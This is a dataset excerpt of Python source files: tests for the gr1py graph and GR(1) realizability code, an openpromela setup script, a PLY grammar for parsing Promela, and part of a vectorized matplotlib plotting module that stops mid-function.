metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "johnyf/gr1py",
"score": 3
} |
#### File: gr1py/tests/test_minnx.py
```python
from gr1py.minnx import DiGraph
class DiGraph_test(object):
def setUp(self):
self.G = DiGraph()
def tearDown(self):
self.G = None
def test_add_remove_nodes(self):
assert self.G.number_of_nodes() == 0
self.G.add_node(0)
assert self.G.number_of_nodes() == 1
self.G.add_nodes_from(range(10))
assert self.G.number_of_nodes() == 10
self.G.remove_node(0)
assert self.G.number_of_nodes() == 9
def test_add_remove_edges(self):
assert self.G.number_of_nodes() == 0
self.G.add_edge(0,1)
assert self.G.number_of_nodes() == 2
self.G.add_edge(0,2)
assert self.G.number_of_nodes() == 3
self.G.remove_edge(0,1)
assert self.G.number_of_nodes() == 3
assert self.G.has_edge(0, 2) and not self.G.has_edge(0, 1)
def test_add_remove_edges_from(self):
assert self.G.number_of_nodes() == 0
self.G.add_edges_from([(0,1), (0,2)])
assert self.G.number_of_nodes() == 3
self.G.add_edges_from([(0,1), (1,3)])
assert self.G.number_of_nodes() == 4
self.G.remove_edges_from([(0,2), (0,1)])
assert self.G.number_of_nodes() == 4
assert self.G.has_edge(1, 3)
assert not self.G.has_edge(0, 2) and not self.G.has_edge(0, 1)
```
#### File: gr1py/tests/test_realizability.py
```python
import gr1py.cli
from gr1py.solve import check_realizable
ARBITER1_SPC_GR1C = """
ENV: r1;
SYS: g1;
ENVINIT: !r1;
ENVTRANS:
[](((r1 & !g1) | (!r1 & g1)) -> ((r1' & r1) | (!r1' & !r1)));
ENVGOAL:
[]<>!(r1 & g1);
SYSINIT: !g1;
SYSTRANS:
[](((r1 & g1) | (!r1 & !g1)) -> ((g1 & g1') | (!g1 & !g1')));
SYSGOAL:
[]<>((r1 & g1) | (!r1 & !g1));
"""
def check_check_realizable(tsys, exprtab, expected):
assert check_realizable(tsys, exprtab) == expected
def test_check_realizable():
for spcstr, expected in [(ARBITER1_SPC_GR1C, True),
('SYS:x;', True),
('SYS: x;\nSYSGOAL: []<>False;', False)]:
tsys, exprtab = gr1py.cli.loads(spcstr)
yield check_check_realizable, tsys, exprtab, expected
``` |
{
"source": "johnyf/openpromela",
"score": 2
} |
#### File: johnyf/openpromela/setup.py
```python
from setuptools import setup
# inline:
# from openpromela import logic
# import git
description = (
'Generalized reactive(1) synthesis from Promela specifications.')
README = 'README.md'
VERSION_FILE = 'openpromela/_version.py'
MAJOR = 0
MINOR = 1
MICRO = 1
VERSION = '{major}.{minor}.{micro}'.format(
major=MAJOR, minor=MINOR, micro=MICRO)
VERSION_TEXT = (
'# This file was generated from setup.py\n'
"version = '{version}'\n")
install_requires = [
'dd >= 0.3.0',
'networkx >= 1.9.1',
'omega >= 0.0.7',
'ply >= 3.4',
'promela >= 0.0.1']
def git_version(version):
import git
repo = git.Repo('.git')
repo.git.status()
sha = repo.head.commit.hexsha
if repo.is_dirty():
return '{v}.dev0+{sha}.dirty'.format(
v=version, sha=sha)
# commit is clean
# is it release of `version` ?
try:
tag = repo.git.describe(
match='v[0-9]*', exact_match=True,
tags=True, dirty=True)
except git.GitCommandError:
return '{v}.dev0+{sha}'.format(
v=version, sha=sha)
assert tag[1:] == version, (tag, version)
return version
def build_parser_table():
from openpromela import logic
tabmodule = logic.TABMODULE.split('.')[-1]
outputdir = 'openpromela/'
parser = logic.Parser()
parser.build(tabmodule, outputdir=outputdir, write_tables=True)
if __name__ == '__main__':
# version
try:
version = git_version(VERSION)
except:
print('No git info: Assume release.')
version = VERSION
s = VERSION_TEXT.format(version=version)
with open(VERSION_FILE, 'w') as f:
f.write(s)
# build parsers
try:
build_parser_table()
except ImportError:
print('WARNING: `openpromela` could not cache parser tables '
'(ignore this if running only for "egg_info").')
setup(
name='openpromela',
version=version,
description=description,
long_description=open(README).read(),
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/johnyf/openpromela',
license='BSD',
install_requires=install_requires,
tests_require=['nose'],
packages=['openpromela'],
package_dir={'openpromela': 'openpromela'},
entry_points={
'console_scripts':
['ospin = openpromela.logic:command_line_wrapper']})
``` |
{
"source": "johnyf/promela",
"score": 2
} |
#### File: promela/promela/yacc.py
```python
from __future__ import absolute_import
from __future__ import division
import logging
import os
import subprocess
import warnings
import ply.yacc
# inline
#
# import promela.ast as promela_ast
# from promela import lex
TABMODULE = 'promela.promela_parsetab'
logger = logging.getLogger(__name__)
class Parser(object):
"""Production rules for Promela parser."""
logger = logger
tabmodule = TABMODULE
start = 'program'
# http://spinroot.com/spin/Man/operators.html
# spin.y
# lowest to highest
precedence = (
('right', 'EQUALS'),
('left', 'TX2', 'RCV', 'R_RCV'),
('left', 'IMPLIES', 'EQUIV'),
('left', 'LOR'),
('left', 'LAND'),
('left', 'ALWAYS', 'EVENTUALLY'),
('left', 'UNTIL', 'WEAK_UNTIL', 'RELEASE'),
('right', 'NEXT'),
('left', 'OR'),
('left', 'XOR'),
('left', 'AND'),
('left', 'EQ', 'NE'),
('left', 'LT', 'LE', 'GT', 'GE'),
('left', 'LSHIFT', 'RSHIFT'),
('left', 'PLUS', 'MINUS'),
('left', 'TIMES', 'DIVIDE', 'MOD'),
('left', 'INCR', 'DECR'),
('right', 'LNOT', 'NOT', 'UMINUS', 'NEG'), # LNOT is also SND
('left', 'DOT'),
('left', 'LPAREN', 'RPAREN', 'LBRACKET', 'RBRACKET'))
def __init__(self, ast=None, lexer=None):
if ast is None:
import promela.ast as ast
if lexer is None:
from promela import lex
lexer = lex.Lexer()
self.lexer = lexer
self.ast = ast
self.tokens = self.lexer.tokens
self.build()
def build(self, tabmodule=None, outputdir='', write_tables=False,
debug=False, debuglog=None, errorlog=None):
"""Build parser using `ply.yacc`.
Default table module is `self.tabmodule`.
Module logger used as default debug logger.
Default error logger is that created by PLY.
"""
if tabmodule is None:
tabmodule = self.tabmodule
if debug and debuglog is None:
debuglog = self.logger
self.parser = ply.yacc.yacc(
method='LALR',
module=self,
start=self.start,
tabmodule=tabmodule,
outputdir=outputdir,
write_tables=write_tables,
debug=debug,
debuglog=debuglog,
errorlog=errorlog)
def parse(self, promela):
"""Parse string of Promela code."""
s = cpp(promela)
program = self.parser.parse(
s, lexer=self.lexer.lexer, debug=self.logger)
return program
def _iter(self, p):
if p[2] is not None:
p[1].append(p[2])
return p[1]
def _end(self, p):
if p[1] is None:
return list()
else:
return [p[1]]
# Top-level constructs
# ====================
def p_program(self, p):
"""program : units"""
p[0] = self.ast.Program(p[1])
def p_units_iter(self, p):
"""units : units unit"""
p[0] = self._iter(p)
def p_units_end(self, p):
"""units : unit"""
p[0] = self._end(p)
# TODO: events, c_fcts, ns, error
def p_unit_proc(self, p):
"""unit : proc
| init
| claim
| ltl
"""
p[0] = p[1]
def p_unit_decl(self, p):
"""unit : one_decl
| utype
"""
p[0] = p[1]
def p_unit_semi(self, p):
"""unit : semi"""
def p_proc(self, p):
("""proc : prefix_proctype NAME"""
""" LPAREN decl RPAREN"""
""" opt_priority opt_enabler"""
""" body
""")
inst = p[1]
name = p[2]
args = p[4]
priority = p[6]
enabler = p[7]
body = p[8]
p[0] = self.ast.Proctype(
name, body, args=args, priority=priority,
provided=enabler, **inst)
# instantiator
def p_inst(self, p):
"""prefix_proctype : ACTIVE opt_index proctype"""
d = p[3]
if p[2] is None:
n_active = self.ast.Integer('1')
else:
n_active = p[2]
d['active'] = n_active
p[0] = d
def p_inactive_proctype(self, p):
"""prefix_proctype : proctype"""
p[0] = p[1]
def p_opt_index(self, p):
"""opt_index : LBRACKET expr RBRACKET
| LBRACKET NAME RBRACKET
"""
p[0] = p[2]
def p_opt_index_empty(self, p):
"""opt_index : empty"""
def p_init(self, p):
"""init : INIT opt_priority body"""
p[0] = self.ast.Init(name='init', body=p[3], priority=p[2])
def p_claim(self, p):
"""claim : CLAIM optname body"""
name = p[2] if p[2] else 'never'
p[0] = self.ast.NeverClaim(name=name, body=p[3])
# user-defined type
def p_utype(self, p):
"""utype : TYPEDEF NAME LBRACE decl_lst RBRACE"""
seq = self.ast.Sequence(p[4])
p[0] = self.ast.TypeDef(p[2], seq)
def p_ltl(self, p):
"""ltl : LTL LBRACE expr RBRACE"""
p[0] = self.ast.LTL(p[3])
# Declarations
# ============
def p_decl(self, p):
"""decl : decl_lst"""
p[0] = self.ast.Sequence(p[1])
def p_decl_empty(self, p):
"""decl : empty"""
def p_decl_lst_iter(self, p):
"""decl_lst : one_decl SEMI decl_lst"""
p[0] = [p[1]] + p[3]
def p_decl_lst_end(self, p):
"""decl_lst : one_decl"""
p[0] = [p[1]]
def p_one_decl_visible(self, p):
"""one_decl : vis typename var_list
| vis NAME var_list
"""
visible = p[1]
typ = p[2]
var_list = p[3]
p[0] = self.one_decl(typ, var_list, visible)
def p_one_decl(self, p):
"""one_decl : typename var_list
| NAME var_list
"""
typ = p[1]
var_list = p[2]
p[0] = self.one_decl(typ, var_list)
def one_decl(self, typ, var_list, visible=None):
c = list()
for d in var_list:
v = self.ast.VarDef(vartype=typ, visible=visible, **d)
c.append(v)
return self.ast.Sequence(c)
# message type declaration
def p_one_decl_mtype_vis(self, p):
"""one_decl : vis MTYPE asgn LBRACE name_list RBRACE"""
p[0] = self.ast.MessageType(p[5], visible=p[1])
def p_one_decl_mtype(self, p):
"""one_decl : MTYPE asgn LBRACE name_list RBRACE"""
p[0] = self.ast.MessageType(p[3])
def p_name_list_iter(self, p):
"""name_list : name_list COMMA NAME"""
p[1].append(p[3])
p[0] = p[1]
def p_name_list_end(self, p):
"""name_list : NAME"""
p[0] = [p[1]]
def p_var_list_iter(self, p):
"""var_list : ivar COMMA var_list"""
p[0] = [p[1]] + p[3]
def p_var_list_end(self, p):
"""var_list : ivar"""
p[0] = [p[1]]
# TODO: vardcl asgn LBRACE c_list RBRACE
# ivar = initialized variable
def p_ivar(self, p):
"""ivar : vardcl"""
p[0] = p[1]
def p_ivar_asgn(self, p):
"""ivar : vardcl asgn expr"""
expr = self.ast.Expression(p[3])
p[1]['initval'] = expr
p[0] = p[1]
def p_vardcl(self, p):
"""vardcl : NAME"""
p[0] = {'name': p[1]}
# p.403, SPIN manual
def p_vardcl_unsigned(self, p):
"""vardcl : NAME COLON const"""
p[0] = {'name': p[1], 'bitwidth': p[3]}
def p_vardcl_array(self, p):
"""vardcl : NAME LBRACKET const_expr RBRACKET"""
p[0] = {'name': p[1], 'length': p[3]}
def p_vardcl_chan(self, p):
"""vardcl : vardcl EQUALS ch_init"""
p[1].update(p[3])
p[0] = p[1]
def p_typename(self, p):
"""typename : BIT
| BOOL
| BYTE
| CHAN
| INT
| PID
| SHORT
| UNSIGNED
| MTYPE
"""
p[0] = p[1]
def p_ch_init(self, p):
("""ch_init : LBRACKET const_expr RBRACKET """
""" OF LBRACE typ_list RBRACE""")
p[0] = {'length': p[2], 'msg_types': p[6]}
def p_typ_list_iter(self, p):
"""typ_list : typ_list COMMA basetype"""
p[1].append(p[3])
p[0] = p[1]
def p_typ_list_end(self, p):
"""typ_list : basetype"""
p[0] = [p[1]]
# TODO: | UNAME | error
def p_basetype(self, p):
"""basetype : typename"""
p[0] = p[1]
# References
# ==========
def p_varref(self, p):
"""varref : cmpnd"""
p[0] = p[1]
def p_cmpnd_iter(self, p):
"""cmpnd : cmpnd PERIOD cmpnd %prec DOT"""
p[0] = self.ast.VarRef(extension=p[3], **p[1])
def p_cmpnd_end(self, p):
"""cmpnd : pfld"""
p[0] = self.ast.VarRef(**p[1])
# pfld = prefix field
def p_pfld_indexed(self, p):
"""pfld : NAME LBRACKET expr RBRACKET"""
p[0] = {'name': p[1], 'index': p[3]}
def p_pfld(self, p):
"""pfld : NAME"""
p[0] = {'name': p[1]}
# Attributes
# ==========
def p_opt_priority(self, p):
"""opt_priority : PRIORITY number"""
p[0] = p[2]
def p_opt_priority_empty(self, p):
"""opt_priority : empty"""
def p_opt_enabler(self, p):
"""opt_enabler : PROVIDED LPAREN expr RPAREN"""
p[0] = p[3]
def p_opt_enabler_empty(self, p):
"""opt_enabler : empty"""
def p_body(self, p):
"""body : LBRACE sequence os RBRACE"""
p[0] = p[2]
# Sequence
# ========
def p_sequence(self, p):
"""sequence : sequence msemi step"""
p[1].append(p[3])
p[0] = p[1]
def p_sequence_ending_with_atomic(self, p):
"""sequence : seq_block step"""
p[1].append(p[2])
p[0] = p[1]
def p_sequence_single(self, p):
"""sequence : step"""
p[0] = self.ast.Sequence([p[1]])
def p_seq_block(self, p):
"""seq_block : sequence msemi atomic
| sequence msemi dstep
"""
p[1].append(p[3])
p[0] = p[1]
def p_seq_block_iter(self, p):
"""seq_block : seq_block atomic
| seq_block dstep
"""
p[1].append(p[2])
p[0] = p[1]
def p_seq_block_single(self, p):
"""seq_block : atomic
| dstep
"""
p[0] = [p[1]]
# TODO: XU vref_lst
def p_step_1(self, p):
"""step : one_decl
| stmnt
"""
p[0] = p[1]
def p_step_labeled(self, p):
"""step : NAME COLON one_decl"""
raise Exception(
'label preceding declaration: {s}'.format(s=p[3]))
def p_step_3(self, p):
"""step : NAME COLON XR
| NAME COLON XS
"""
raise Exception(
'label preceding xr/xs claim')
def p_step_4(self, p):
"""step : stmnt UNLESS stmnt"""
p[0] = (p[1], 'unless', p[3])
self.logger.warning('UNLESS not interpreted yet')
# Statement
# =========
def p_stmnt(self, p):
"""stmnt : special
| statement
"""
p[0] = p[1]
# Stmnt in spin.y
def p_statement_asgn(self, p):
"""statement : varref asgn full_expr"""
p[0] = self.ast.Assignment(var=p[1], value=p[3])
def p_statement_incr(self, p):
"""statement : varref INCR"""
one = self.ast.Integer('1')
expr = self.ast.Expression(self.ast.Binary('+', p[1], one))
p[0] = self.ast.Assignment(p[1], expr)
def p_statement_decr(self, p):
"""statement : varref DECR"""
one = self.ast.Integer('1')
expr = self.ast.Expression(self.ast.Binary('-', p[1], one))
p[0] = self.ast.Assignment(p[1], expr)
def p_statement_assert(self, p):
"""statement : ASSERT full_expr"""
p[0] = self.ast.Assert(p[2])
def p_statement_fifo_receive(self, p):
"""statement : varref RCV rargs"""
p[0] = self.ast.Receive(p[1], p[3])
def p_statement_copy_fifo_receive(self, p):
"""statement : varref RCV LT rargs GT"""
p[0] = self.ast.Receive(p[1], p[4])
def p_statement_random_receive(self, p):
"""statement : varref R_RCV rargs"""
p[0] = self.ast.Receive(p[1], p[3])
def p_statement_copy_random_receive(self, p):
"""statement : varref R_RCV LT rargs GT"""
p[0] = self.ast.Receive(p[1], p[4])
def p_statement_tx2(self, p):
"""statement : varref TX2 margs"""
p[0] = self.ast.Send(p[1], p[3])
def p_statement_full_expr(self, p):
"""statement : full_expr"""
p[0] = p[1]
def p_statement_else(self, p):
"""statement : ELSE"""
p[0] = self.ast.Else()
def p_statement_atomic(self, p):
"""statement : atomic"""
p[0] = p[1]
def p_atomic(self, p):
"""atomic : ATOMIC LBRACE sequence os RBRACE"""
s = p[3]
s.context = 'atomic'
p[0] = s
def p_statement_dstep(self, p):
"""statement : dstep"""
p[0] = p[1]
def p_dstep(self, p):
"""dstep : D_STEP LBRACE sequence os RBRACE"""
s = p[3]
s.context = 'd_step'
p[0] = s
def p_statement_braces(self, p):
"""statement : LBRACE sequence os RBRACE"""
p[0] = p[2]
# the stmt of line 696 in spin.y collects the inline ?
def p_statement_call(self, p):
"""statement : NAME LPAREN args RPAREN"""
# NAME = INAME = inline
c = self.ast.Inline(p[1], p[3])
p[0] = self.ast.Sequence([c])
def p_statement_assgn_call(self, p):
"""statement : varref asgn NAME LPAREN args RPAREN statement"""
inline = self.ast.Inline(p[3], p[5])
p[0] = self.ast.Assignment(p[1], inline)
def p_statement_return(self, p):
"""statement : RETURN full_expr"""
p[0] = self.ast.Return(p[2])
def p_printf(self, p):
"""statement : PRINT LPAREN STRING prargs RPAREN"""
p[0] = self.ast.Printf(p[3], p[4])
# yet unimplemented for statement:
# SET_P l_par two_args r_par
# PRINTM l_par varref r_par
# PRINTM l_par CONST r_par
# ccode
# Special
# =======
def p_special(self, p):
"""special : varref RCV"""
p[0] = self.ast.Receive(p[1])
def p_varref_lnot(self, p):
"""special : varref LNOT margs"""
raise NotImplementedError
def p_break(self, p):
"""special : BREAK"""
p[0] = self.ast.Break()
def p_goto(self, p):
"""special : GOTO NAME"""
p[0] = self.ast.Goto(p[2])
def p_labeled_stmt(self, p):
"""special : NAME COLON stmnt"""
p[0] = self.ast.Label(p[1], p[3])
def p_labeled(self, p):
"""special : NAME COLON"""
p[0] = self.ast.Label(
p[1],
self.ast.Expression(self.ast.Bool('true')))
def p_special_if(self, p):
"""special : IF options FI"""
p[0] = self.ast.Options('if', p[2])
def p_special_do(self, p):
"""special : DO options OD"""
p[0] = self.ast.Options('do', p[2])
def p_options_end(self, p):
"""options : option"""
p[0] = [p[1]]
def p_options_iter(self, p):
"""options : options option"""
p[1].append(p[2])
p[0] = p[1]
def p_option(self, p):
"""option : COLONS sequence os"""
s = p[2]
s.is_option = True
p[0] = s
# Expressions
# ===========
def p_full_expr(self, p):
"""full_expr : expr
| pexpr
"""
p[0] = self.ast.Expression(p[1])
# probe expr = no negation allowed (positive)
def p_pexpr(self, p):
"""pexpr : probe
| LPAREN pexpr RPAREN
| pexpr LAND pexpr
| pexpr LAND expr
| expr LAND pexpr
| pexpr LOR pexpr
| pexpr LOR expr
| expr LOR pexpr
"""
p[0] = 'pexpr'
def p_probe(self, p):
"""probe : FULL LPAREN varref RPAREN
| NFULL LPAREN varref RPAREN
| EMPTY LPAREN varref RPAREN
| NEMPTY LPAREN varref RPAREN
"""
p[0] = 'probe'
def p_expr_paren(self, p):
"""expr : LPAREN expr RPAREN"""
p[0] = p[2]
def p_expr_arithmetic(self, p):
"""expr : expr PLUS expr
| expr MINUS expr
| expr TIMES expr
| expr DIVIDE expr
| expr MOD expr
"""
p[0] = self.ast.Binary(p[2], p[1], p[3])
def p_expr_not(self, p):
"""expr : NOT expr
| MINUS expr %prec UMINUS
| LNOT expr %prec NEG
"""
p[0] = self.ast.Unary(p[1], p[2])
def p_expr_logical(self, p):
"""expr : expr AND expr
| expr OR expr
| expr XOR expr
| expr LAND expr
| expr LOR expr
"""
p[0] = self.ast.Binary(p[2], p[1], p[3])
# TODO: cexpr
def p_expr_shift(self, p):
"""expr : expr LSHIFT expr
| expr RSHIFT expr
"""
p[0] = p[1]
def p_expr_const_varref(self, p):
"""expr : const
| varref
"""
p[0] = p[1]
def p_expr_varref(self, p):
"""expr : varref RCV LBRACKET rargs RBRACKET
| varref R_RCV LBRACKET rargs RBRACKET
"""
p[0] = p[1]
warnings.warn('not implemented')
def p_expr_other(self, p):
"""expr : LPAREN expr ARROW expr COLON expr RPAREN
| LEN LPAREN varref RPAREN
| ENABLED LPAREN expr RPAREN
| GET_P LPAREN expr RPAREN
"""
p[0] = p[1]
warnings.warn('"{s}" not implemented'.format(s=p[1]))
def p_expr_run(self, p):
"""expr : RUN aname LPAREN args RPAREN opt_priority"""
p[0] = self.ast.Run(p[2], p[4], p[6])
def p_expr_other_2(self, p):
"""expr : TIMEOUT
| NONPROGRESS
| PC_VAL LPAREN expr RPAREN
"""
raise NotImplementedError()
def p_expr_remote_ref_proctype_pc(self, p):
"""expr : NAME AT NAME
"""
p[0] = self.ast.RemoteRef(p[1], p[3])
def p_expr_remote_ref_pid_pc(self, p):
"""expr : NAME LBRACKET expr RBRACKET AT NAME"""
p[0] = self.ast.RemoteRef(p[1], p[6], pid=p[3])
def p_expr_remote_ref_var(self, p):
"""expr : NAME LBRACKET expr RBRACKET COLON pfld"""
# | NAME COLON pfld %prec DOT2
raise NotImplementedError()
def p_expr_comparator(self, p):
"""expr : expr EQ expr
| expr NE expr
| expr LT expr
| expr LE expr
| expr GT expr
| expr GE expr
"""
p[0] = self.ast.Binary(p[2], p[1], p[3])
def p_binary_ltl_expr(self, p):
"""expr : expr UNTIL expr
| expr WEAK_UNTIL expr
| expr RELEASE expr
| expr IMPLIES expr
| expr EQUIV expr
"""
p[0] = self.ast.Binary(p[2], p[1], p[3])
def p_unary_ltl_expr(self, p):
"""expr : NEXT expr
| ALWAYS expr
| EVENTUALLY expr
"""
p[0] = self.ast.Unary(p[1], p[2])
# Constants
# =========
def p_const_expr_const(self, p):
"""const_expr : const"""
p[0] = p[1]
def p_const_expr_unary(self, p):
"""const_expr : MINUS const_expr %prec UMINUS"""
p[0] = self.ast.Unary(p[1], p[2])
def p_const_expr_binary(self, p):
"""const_expr : const_expr PLUS const_expr
| const_expr MINUS const_expr
| const_expr TIMES const_expr
| const_expr DIVIDE const_expr
| const_expr MOD const_expr
"""
p[0] = self.ast.Binary(p[2], p[1], p[3])
def p_const_expr_paren(self, p):
"""const_expr : LPAREN const_expr RPAREN"""
p[0] = p[2]
def p_const(self, p):
"""const : boolean
| number
"""
# lex maps `skip` to `TRUE`
p[0] = p[1]
def p_bool(self, p):
"""boolean : TRUE
| FALSE
"""
p[0] = self.ast.Bool(p[1])
def p_number(self, p):
"""number : INTEGER"""
p[0] = self.ast.Integer(p[1])
# Auxiliary
# =========
def p_two_args(self, p):
"""two_args : expr COMMA expr"""
def p_args(self, p):
"""args : arg"""
p[0] = p[1]
def p_prargs(self, p):
"""prargs : COMMA arg"""
p[0] = p[2]
def p_prargs_empty(self, p):
"""prargs : empty"""
def p_args_empty(self, p):
"""args : empty"""
def p_margs(self, p):
"""margs : arg
| expr LPAREN arg RPAREN
"""
def p_arg(self, p):
"""arg : expr
| expr COMMA arg
"""
p[0] = 'arg'
# TODO: CONST, MINUS CONST %prec UMIN
def p_rarg(self, p):
"""rarg : varref
| EVAL LPAREN expr RPAREN
"""
p[0] = 'rarg'
def p_rargs(self, p):
"""rargs : rarg
| rarg COMMA rargs
| rarg LPAREN rargs RPAREN
| LPAREN rargs RPAREN
"""
def p_proctype(self, p):
"""proctype : PROCTYPE
| D_PROCTYPE
"""
if p[1] == 'proctype':
p[0] = dict(d_proc=False)
else:
p[0] = dict(d_proc=True)
# PNAME
def p_aname(self, p):
"""aname : NAME"""
p[0] = p[1]
# optional name
def p_optname(self, p):
"""optname : NAME"""
p[0] = p[1]
def p_optname_empty(self, p):
"""optname : empty"""
# optional semi
def p_os(self, p):
"""os : empty
| semi
"""
p[0] = ';'
# multi-semi
def p_msemi(self, p):
"""msemi : semi
| msemi semi
"""
p[0] = ';'
def p_semi(self, p):
"""semi : SEMI
| ARROW
"""
p[0] = ';'
def p_asgn(self, p):
"""asgn : EQUALS
| empty
"""
p[0] = None
def p_visible(self, p):
"""vis : HIDDEN
| SHOW
| ISLOCAL
"""
p[0] = {'visible': p[1]}
def p_empty(self, p):
"""empty : """
def p_error(self, p):
raise Exception('syntax error at: {p}'.format(p=p))
def cpp(s):
"""Call the C{C} preprocessor with input C{s}."""
try:
p = subprocess.Popen(['cpp', '-E', '-x', 'c'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
except OSError as e:
if e.errno == os.errno.ENOENT:
raise Exception('C preprocessor (cpp) not found in path.')
else:
raise
logger.debug('cpp input:\n' + s)
stdout, stderr = p.communicate(s)
logger.debug('cpp returned: {c}'.format(c=p.returncode))
logger.debug('cpp stdout:\n {out}'.format(out=stdout))
return stdout
def rebuild_table(parser, tabmodule):
# log details to file
h = logging.FileHandler('log.txt', mode='w')
debuglog = logging.getLogger()
debuglog.addHandler(h)
debuglog.setLevel('DEBUG')
import os
outputdir = './'
# rm table files to force rebuild to get debug output
tablepy = tabmodule + '.py'
tablepyc = tabmodule + '.pyc'
try:
os.remove(tablepy)
except:
print('no "{t}" found'.format(t=tablepy))
try:
os.remove(tablepyc)
except:
print('no "{t}" found'.format(t=tablepyc))
parser.build(tabmodule, outputdir=outputdir,
write_tables=True, debug=True,
debuglog=debuglog)
if __name__ == '__main__':
rebuild_table(Parser(), TABMODULE.split('.')[-1])
# TODO
#
# expr << expr
# expr >> expr
# (expr -> expr : expr)
# run func(args) priority
# len(varref)
# enabled(expr)
# get_p(expr)
# var ? [rargs]
# var ?? [rargs]
# timeout
# nonprogress
# pc_val(expr)
# name[expr] @ name
# name[expr] : pfld
# name @ name
# name : pfld
``` |
{
"source": "johnyf/pyvectorized",
"score": 3
} |
#### File: pyvectorized/pyvectorized/vectorized_plot.py
```python
from __future__ import division
from warnings import warn
import numpy as np
from matplotlib import pyplot as plt
#from mayavi import mlab
from multi_plot import newax
from vectorized_meshgrid import domain2vec, vec2meshgrid, res2meshsize
from multidim_plot import quiver
def ezquiver(
func,
domain = np.array([0, 1, 0, 1]).reshape(1, -1),
resolution = np.array([30, 29]).reshape(1, -1),
ax = None,
*args, **kwargs
):
"""Vectorized quiver for functions with vector args.
@param func: function handle
@param domain: rectangular plotting domain
= [xmin, xmax, ymin, ymax]
@param resolution: grid spacing
= [nx, ny]
@param ax: axes object handle
@param args: positional arguments forwarded to func
@param kwargs: key-value args for func
"""
if ax is None:
ax = newax()
q = domain2vec(domain, resolution)
v = feval(func, q, **kwargs)
quiver(ax, q, v)
def contour(q, z, res, ax=None, **kwargs):
"""Vectorized wrapper for contour plot.
@param q: coordinates of contour points
@type q: [2 x #points]
@param z: row vector of scalar function
@type z: [1 x #points]
@param res: resolution of contour
@type res: [nx, ny]
@param ax: axes object handle
@param kwargs: passed to contour function as given, see its help
@return: h = handle to contour object created.
"""
if ax is None:
ax = newax()
# multiple axes ?
try:
contours = []
for curax in ax:
cont = contour(curax, q, z, res, **kwargs)
contours.append(cont)
return contours
except:
pass
# enough dimensions ?
ndim = q.shape[0]
if ndim < 2:
raise Exception('space dim = q.shape[0] = 1.')
res = res2meshsize(res)
# Z ?
if z is None:
z = np.zeros(1, q.shape[1])
elif z is np.NaN:
z = 5 * np.random.rand(1, q.shape[1])
else:
z = z * np.ones([1, q.shape[1] ])
X, Y = vec2meshgrid(q, res) # nargout=2
Z, = vec2meshgrid(z, res)
# calc
if ndim < 3:
cont = ax.contour(X, Y, Z, 100, **kwargs)
else:
raise Exception('Dimension of vector q is not 2.')
return cont
def contourf(q, z, res, ax=None, **kwargs):
"""Vectorized filled contour plot.
@param q: coordinates of contour points
@type q: [2 x #points] |
@param z: row vector of scalar function
@type z: [1 x #points]
@param res: resolution of contour
@type res: [nx, ny]
@param ax: axes object handle
@return: h = handle to filled contour
"""
if ax is None:
ax = newax()
# multiple axes ?
try:
contours = []
for curax in ax:
cont = contourf(curax, q, z, res, **kwargs)
contours.append(cont)
return contours
except:
pass
# enough dimensions ?
ndim = q.shape[0]
if ndim < 2:
raise Exception('space dim = q.shape[0] = 1.')
res = res2meshsize(res)
# Z ?
if z is None:
z = np.zeros(1, q.shape[1])
elif z is np.NaN:
z = 5 * np.random.rand(1, q.shape[1])
else:
z = z * np.ones([1, q.shape[1] ])
X, Y = vec2meshgrid(q, res) # nargout=2
Z, = vec2meshgrid(z, res)
# calc
if ndim < 3:
cont = ax.contourf(X, Y, Z, 25, **kwargs)
else:
raise Exception('Dimension of vector q is not 2.')
return cont
def ezcontour(func, ax, domain, resolution,
values, **kwargs):
"""Vectorized easy contour,
for functions accepting vector arguments.
@param ax: axes object handle
@param func: function handle
@param domain: rectangular plotting domain
@type domain: [xmin, xmax, ymin, ymax]
@param resolution: grid spacing
@type resolution: [nx, ny]
@param values: level set values
@type values: [v1, v2, ..., vN]
@param kwargs: additional arguments for
input to func
"""
# which axes ?
if (0 in ax.shape):
warn('vezcontour:axes',
'Axes object handle ax is empty, no plot.')
return
# which domain ?
if not domain:
domain = np.array([0, 1, 0, 1]).reshape(1, -1)
# at what grid resolution ?
if not resolution:
resolution = np.array([30, 29]).reshape(1, -1)
else:
if (0 in resolution.shape):
resolution = np.array([30, 29]).reshape(1, -1)
# which level sets ?
if not values:
values = np.array([])
# compute surface
q, X, Y = domain2vec(domain, resolution) # nargout=3
f = feval(func, q, **kwargs)
Z = vec2meshgrid(f, X)
# default level set values ?
if (0 in values.shape):
plt.contour(ax, X, Y, Z)
else:
plt.contour(ax, X, Y, Z, values)
return
def ezsurf(func, domain, resolution, ax, **kwargs):
"""Vectorized ezsurf,
for functions accepting vector arguments.
input
ax = axes object handle
func = function handle
optional input
domain = rectangular plotting domain
= [xmin, xmax, ymin, ymax]
resolution = grid spacing
= [nx, ny]
varargin = additional arguments for input to func
@return (q, f) where:
- q = domain points
- f = function values at q
"""
# which axes ?
if (0 in ax.shape):
warn('vezsurf:axes', 'Axes object handle ax is empty, no plot.')
return varargout
# which domain ?
if not domain:
domain = np.array([0, 1, 0, 1]).reshape(1, -1)
# at what grid resolution ?
if not resolution:
resolution = np.array([30, 29]).reshape(1, -1)
else:
if (0 in resolution.shape):
resolution = np.array([30, 29]).reshape(1, -1)
q = domain2vec(domain, resolution)
f = feval(func, q, varargin[:])
vsurf(ax, q, f, resolution)
if nargout > 0:
varargout[0, 0] = q
varargout[0, 1] = f
return varargout
def surf(q, z, resolution,
ax=None, **kwargs):
"""Vectorized surf.
Vectorized wrapper for the surf function.
When q is 2-dimensional, then z is the height function.
When q is 3-dimensional, then z is the color function of the surface.
see also
mpl.plot_surface, vec2meshgrid
@param ax: axes object handle
@param q: coordinates of surface points
= [2 x #points] |
= [3 x #points], when color data are provided in vector z
@param z: row vector of height or color data for surface points
@type z: [1 x #points] | [], depending on the cases:
1) when size(q, 1) == 2, then z is assumed to be the values of a
scalar function to be plotted over the 2-dimensional domain defined
by the points in the matrix of column position vectors q.
2) when size(q, 1) == 3, then q are the coordinates of the points in
3-dimensional space, whereas z is assumed to be the row vector
specifying the surface color at each point.
special cases:
- [] (0 color)
- NaN (random colors)
- scalar (uniform color)
- 'scaled' (scaled colors indexed in colormap)
@param resolution: resolution of surface
@type resolution: [nx, ny] | [nx, ny, nz]
@return: surface object created.
"""
# depends
# vec2meshgrid, res2meshsize
if ax is None:
ax = newax()
